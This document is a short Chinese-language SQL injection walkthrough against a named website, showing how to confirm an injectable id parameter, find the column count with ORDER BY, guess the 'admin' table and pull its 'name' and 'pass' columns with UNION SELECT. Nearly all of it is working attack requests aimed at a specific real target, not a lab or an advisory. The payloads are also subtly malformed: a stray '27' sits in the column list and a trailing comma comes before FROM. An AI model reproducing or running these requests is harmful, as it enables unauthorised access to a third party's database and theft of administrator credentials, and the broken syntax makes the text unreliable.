目标网站:http://www.yousucn.com

注入点:http://www.yousucn.com/news_ny.asp?id=284

 

加 and 1=1

 

http://www.yousucn.com/news_ny.asp?id=284 and 1=1 网站正常

 

加入 and 1=2

 

http://www.yousucn.com/news_ny.asp?id=284 and 1=2 网站不正常

 

and 1=2 错误说明存在注入点

 

接着order by id 猜id号

 

 

 

Order by 10 正常

Order by 20 正常

Order by 30 不正常

Order by 25 正常

Order by 26 不正常

 

 

http://www.yousucn.com/news_ny.asp?id=284 order by 25

 

由此可知字段数是25

 

接下来猜表名:

 

and     1=2   union       select

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,27,18,19,20,21,22,23,24,25,

from admin

表名admin存在

 

正确得到显示位3和6

 

接着猜列名:存在3的位置输入常用列名如username,admin_user,那么等等

而在这里我们输入的是name。在6的位置上输入常用列名如password,pass,admin_pwd,pwd等等,这里要的是pass;

 

 

 

http://www.yousucn.com/news_ny.asp?id=284  and     1=2   union       select

1,2,name,4,5,pass,7,8,9,10,11,12,13,14,15,16,27,18,19,20,21,22,23,24,25,

from admin